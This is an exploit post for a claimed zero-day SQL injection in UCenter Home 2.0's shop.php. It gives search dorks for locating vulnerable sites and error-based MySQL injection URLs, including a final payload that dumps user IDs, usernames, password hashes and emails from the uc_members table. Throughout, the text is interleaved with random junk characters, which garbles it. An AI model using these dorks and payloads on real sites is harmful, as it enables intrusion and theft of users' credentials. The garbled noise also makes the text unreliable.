( Z! b, C& Y/ A
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
9 J# C" E9 z, j' z6 O6 J
! O2 G; _; } P3 X5 I2 ]4 `2 a
8 u9 y; \( M8 O" x) U( {; X% }9 r& t' P8 U7 t4 h9 u9 y9 y( Q
*/ Author : KnocKout 7 ^2 _0 B# `# t* j' O; r: p& M: |
& \7 }. v% z2 R. J% D" I3 _
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 4 Y1 m! @2 t/ Q, c7 `5 }( h: ]) x( [% a
; ]7 T* d7 g" k$ A) `. C*/ Contact: knockoutr@msn.com
" a% G* J+ Q% ~' V$ \) O: V3 c4 R0 t: T( x3 t
*/ Cyber-Warrior.org/CWKnocKout
$ }$ H2 F+ i$ _9 v) z" O" x) p+ T3 l: W
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 s( B) ^2 {9 [; U
- C/ t: C2 a/ u& _5 |Script : UCenter Home
4 @) r* Y! d8 G# }6 v( n3 S# H) L. c6 f' N; }: d6 ]/ N; t& _
Version : 2.0 : E% y5 m; Y9 i6 ^
6 n: z0 f" j! Y2 R4 }* o
Script HomePage : http://u.discuz.net/
0 Z: y* y$ ~' M: }1 L$ g. C; Y2 C; s' J# J, Y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; {1 n% E e. o' H4 J' c- F
# b0 m) U5 @) |: P) ?: f7 x
Dork : Powered by UCenter inurl:shop.php?ac=view
3 T) D' Q8 _4 v h" W) J8 K# L3 W+ g" Z8 Y- |- X) o! {& {* r
Dork 2 : inurl:shop.php?ac=view&shopid=
; X* f1 P% u6 Y7 ]# d z0 K6 m" D$ Q4 k8 n7 ]1 R( m6 \/ P3 L& N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; q: i( _1 p" D6 d) M8 u$ G! ] j9 R3 w9 u& F2 A7 x: h& Q
Vuln file : Shop.php ' K& g, y1 s& X
' J2 g" M) B; o* e& J
value's : (?)ac=view&shopid=
/ R0 N7 S3 e$ v4 K
/ a( o# k# h! \7 b: O: I* t8 eVulnerable Style : SQL Injection (MySQL Error Based) / e k" X Q2 M) }5 G0 ^
, r: X' ]1 L9 K
Need Metarials : Hex Conversion 1 S: i. H, T$ y/ b
" l3 m: ?7 J. g5 Q+ t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 ~$ U/ u0 b4 X) R. W: m) D0 P: U7 C' \
Your Need victim Database name.
; O) \8 L! k+ B% X( e. v) z) @8 R( O: ~! M
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
9 Q+ F2 t. J6 J+ q( w
8 a: z# Q3 ] m) J* r3 n.. 3 ]! a! E9 i1 s3 g; _. m0 j- z4 G) Z. v
' d) z4 f" n/ W/ `1 N2 ~& Q; G
DB : Okey. ; {7 U) L, h" {4 y2 A3 @8 F# e
4 Q l/ e# U* I5 L- qyour edit DB `[TARGET DB NAME]`
' b& b! X1 o% s& V3 [ h; P0 A: I+ A& n
Example : 'hiwir1_ucenter' : y5 H5 K' W/ E5 S
- B, f* P; S$ B) L
Edit : Okey. . V, F( v L2 Q f7 i- ^
; G" M+ T/ j4 TYour use Hex conversion. And edit Your SQL Injection Exploit.. 0 y: \) @, D9 X. E
# w' N/ s' b6 {0 [; u) q% F 0 N0 { I& q. t4 ?. K+ X' i' s+ V% c/ W
) M9 V( Z" ]. p3 c3 D) h9 ], U
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
% X0 G6 P1 S; i4 U7 Y7 h |